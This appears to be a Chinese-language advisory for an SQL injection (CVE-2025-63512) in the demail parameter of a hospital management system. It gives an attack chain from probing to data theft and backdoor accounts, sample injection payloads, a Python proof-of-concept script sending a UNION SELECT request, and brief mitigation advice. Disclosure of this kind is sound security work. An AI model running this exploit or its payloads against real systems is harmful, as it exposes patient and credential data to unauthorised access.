CVE-2025-63512 kishan0725 Hospital Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-63512

漏洞类型

SQL注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kishan0725 Hospital Management System v4

漏洞概述

kishan0725 Hospital Management System v4是一款医院管理系统，广泛应用于医疗机构用于管理患者信息、医生排班、医院运营等业务。该系统存在严重的SQL注入漏洞，位于admin-panel1.php文件中的删除医生功能模块。攻击者可通过demail参数注入恶意SQL语句，实现未授权数据库操作。漏洞源于应用程序在处理用户输入时未进行充分的输入验证和参数化查询，直接将用户可控的demail参数拼接到SQL查询语句中。由于该接口无需认证即可访问，远程攻击者可直接利用此漏洞获取数据库敏感信息，包括患者隐私数据、医生信息、医院运营数据等。此漏洞CVSS评分为6.5，属于中危漏洞，但考虑到医疗系统的敏感性，数据泄露可能造成严重的隐私合规问题和法律责任。

技术细节

该SQL注入漏洞存在于admin-panel1.php文件的删除医生功能中。具体来说，当管理员或攻击者请求删除医生操作时，系统通过demail参数接收用户输入的医生邮箱地址。然而，应用程序在构建SQL删除语句时，直接将该参数值拼接到SQL查询字符串中，未进行任何输入过滤、转义或使用参数化查询。攻击者可通过构造特殊的SQL payloads，如使用单引号、UNION SELECT、布尔盲注等技术，绕过前端验证并执行任意SQL命令。典型攻击payload可能包括：demail参数注入' OR '1'='1类型的条件判断，或使用UNION语句提取数据库表结构和敏感数据。由于SQL执行结果会返回到客户端响应中，攻击者可以逐步探测数据库内容，包括数据库版本、表名、列名及存储的用户凭证等敏感信息。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为kishan0725 Hospital Management System v4，确认admin-panel1.php存在且可访问

STEP 2

步骤2: 漏洞探测

攻击者访问删除医生功能接口，通过demail参数测试SQL注入漏洞，使用单引号触发SQL语法错误验证漏洞存在

STEP 3

步骤3: 构建恶意Payload

攻击者构造SQL注入payload，如使用UNION SELECT语句或布尔盲注技术，目标是提取数据库中的敏感信息

STEP 4

步骤4: 数据提取

通过SQL注入成功执行恶意SQL语句，逐步获取数据库表结构、用户凭证、患者隐私数据等敏感信息

STEP 5

步骤5: 持久化控制

攻击者可利用获取的数据进行进一步攻击，包括修改数据库内容、创建后门账户或窃取身份信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63512 SQL Injection PoC
# Target: kishan0725 Hospital Management System v4
# Vulnerability: SQL Injection in admin-panel1.php (demail parameter)

def exploit_sqli(target_url, payload):
    """
    Exploit SQL Injection vulnerability in delete doctor function
    target_url: Base URL of the vulnerable application
    payload: SQL injection payload to inject via demail parameter
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/admin-panel1.php"
    
    # Prepare the malicious request
    data = {
        'demail': payload,  # Vulnerable parameter
        'action': 'delete'  # Trigger delete doctor logic
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63512.py <target_url>")
        print("Example: python cve-2025-63512.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Test basic SQL injection
    # Payload: Extract database version
    payload = "' UNION SELECT NULL,version(),NULL,NULL-- -"
    
    print(f"[*] Testing SQL Injection on {target}")
    print(f"[*] Using payload: {payload}")
    
    result = exploit_sqli(target, payload)
    print(f"[+] Response:\n{result}")

if __name__ == "__main__":
    main()

影响范围

kishan0725 Hospital Management System v4

防御指南

临时缓解措施

立即限制对admin-panel1.php的访问权限，在代码修复前暂时关闭删除医生功能模块。同时建议使用Web应用防火墙规则拦截包含SQL特殊字符（如单引号、UNION、SELECT等）的请求，并对所有数据库操作接口进行紧急安全审计。